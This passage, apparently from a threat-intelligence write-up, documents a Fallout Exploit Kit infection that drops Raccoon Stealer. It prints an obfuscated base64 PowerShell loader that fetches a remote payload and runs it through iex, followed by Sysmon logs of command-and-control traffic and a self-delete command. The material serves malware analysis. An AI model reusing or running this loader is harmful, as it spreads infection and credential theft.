B0AFAAdAByACAAbABJADEASQBJAEkASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbAAxADEAbAAxADEAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBsAGwAMQBJADEAMQAxADsAfQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwALABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABsAGwAbABJADEAbAAxAEkAMQBsAHsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABsADEAMQBJAEkAMQAxADsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAEkAMQAxADEAMQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsAEkAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAGwAbAAxADEASQBJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABsAEkASQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAMQBJADEAbAAxADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsADEASQBJADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABJAGwAbABJADEAMQAxADEAMQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwAbAAxADEASQBsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJAEkASQAxAEkAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABsAGwAbABJAGwAMQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwASQBJADEAbABsADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABsAEkASQBsAGwAbAAxAEkAOwBwAHUAYgBsAGkAYwAgAHMAaABvAHIAdAAgAEkASQBJADEASQBsADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGwAMQAxAEkAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwAMQBJADEAMQBsAGwAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAASQAxADEASQAxAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQAxAGwAbABJAEkAMQAxADsAfQA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABsAGwASQBsADEAMQBsAGwASQAxAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACIALABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACgAcwB0AHIAaQBuAGcAIABsADEAMQBsAGwAMQAsAHMAdAByAGkAbgBnACAAbABJAGwAbABsAEkAbAAsAEkAbgB0AFAAdAByACAAbABJAGwAbABJACwASQBuAHQAUAB0AHIAIABJADEASQBJAGwAbAAxACwAYgBvAG8AbAAgAEkAMQBsAEkAMQBsACwAdQBpAG4AdAAgAEkAMQAxADEAMQBJAEkAMQBsAEkAbAAxACwASQBuAHQAUAB0AHIAIABJADEASQAxAEkALABzAHQAcgBpAG4AZwAgAGwAbAAxAGwAMQAxACwAcgBlAGYAIABsAGwAbABJADEAbAAxAEkAMQBsACAAbAAxAEkAMQAxADEAbAAxADEAbABsAEkALABvAHUAdAAgAGwAbAAxADEAbAAxAEkAMQAgAEkASQBJAGwAMQBJAEkASQBJADEASQApADsAfQAiADsAJABsAGwAbAAxADEASQBsAGwAbAA9ACIAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwATABvAHcAXAAkACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwApACsAKAA2ADUALgAuADkAMAApACsAKAA5ADcALgAuADEAMgAyACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4AHwAJQB7AFsAYwBoAGEAcgBdACQAXwB9ACkAKQAuAHQAbQBwACIAOwAkAGwAMQBsAGwASQBJAEkAPQAnAGgAdAB0AHAAcwA6AC8ALwBrAGkAbwB0AG8AbgBhAG0AZQAuAGMAbwBtAC8ANAAzADgANAAvAEUAegB4AC8ATABpAHYAZQB0AHIAYQBwAF8AcwBsAGEAeQBhAGIAbABlAF8AdgBlAHIAaQBzAG0AbwBzAC8ASgBlAHcAYgBpAHIAZAAnADsAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEoARwBOAHMAYQBUADAAbwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBPAFoAWABRAHUAVgAyAFYAaQBRADIAeABwAFoAVwA1ADAASwBUAHMAawBZADIAeABwAEwAawBoAGwAWQBXAFIAbABjAG4ATgBiAEoAMQBWAHoAWgBYAEkAdABRAFcAZABsAGIAbgBRAG4AWABUADAAbgBZAGoAVgAyAE0AagBrADMAUwBYAFEAeQBhAFYARQB6AFoAMwBWAHMATgBDAGMANwBKAEcATgBzAGEAUwA1AEUAYgAzAGQAdQBiAEcAOQBoAFoARQBaAHAAYgBHAFUAbwBKAEcAdwB4AGIARwB4AEoAUwBVAGsAcwBKAEcAeABzAGIARABFAHgAUwBXAHgAcwBiAEMAawA3ACcAKQApAHwAaQBlAHgAOwAkAEkAbABsAGwASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAbABJADEAbAAxAEkAMQBsADsAJABJAGwAbABsAEkALgBsAEkASQBsAGwAbAAxAEkAPQAwAHgAMAA7ACQASQBsAGwAbABJAC4AbABsADEAMQBJAEkAMQAxAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAEkAbABsAGwASQApADsAJABJAEkAbABsADEASQBsADEASQBJADEASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAMQAxAGwAMQBJADEAOwBbAGwAbABJAGwAMQAxAGwAbABJADEAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAGwAMQAxAEkAbABsAGwALAAkAGwAbABsADEAMQBJAGwAbABsACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAEkAbABsAGwASQAsAFsAcgBlAGYAXQAkAEkASQBsAGwAMQBJAGwAMQBJAEkAMQBTobyAfABvAHUAdAAtAG4AdQBsAGwAOwA

[Sysmon Event 3] – Powershell communicating with Fallout EK
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Protocol tcp
SourceIp 192.168.2.24
DestinationIp 136.244.99.131
DestinationHostname 136.244.99.131.vultr.com

[Sysmon Event 3] – Original Payload communicating with Google Drive
Image C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
Protocol tcp
SourceIp 192.168.2.24
DestinationIp 216.58.211.46
DestinationHostname mad08s05-in-f14.1e100.net
DestinationPort 443
DestinationPortName https

[Sysmon Event 3] – Payload communicating with Raccoon C2
Image C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
Protocol tcp
SourceIp 192.168.2.24
DestinationIp 35.189.105.242
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1] Raccoon Stealer deleting self from compromised host
Image C:\Windows\System32\cmd.exe
CommandLine cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q “C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp”
CurrentDirectory C:\Users\Toby\Desktop\
User Toby-PC\Toby
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
ParentCommandLine C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp

[Sysmon Event 3]
Image C:\Windows\System32\PING.EXE
CommandLine ping 1.1.1.1 -n 1 -w 3000
CurrentDirectory C:\Users\Toby\Desktop\
Hashes MD5=6242E3D67787CCBF4E06AD2982853144,SHA256=4CA10DBA7FF487FDB3F1362A3681D7D929F5AA1262CDFD31B04C30826983FB
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q “C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp”

 

IMAGES AND DETAILS:


Shown above: Network traffic associated with the Fallout Exploit Kit and Raccoon Stealer infection

 


Shown Above: Post infection traffic associated with the Raccoon Stealer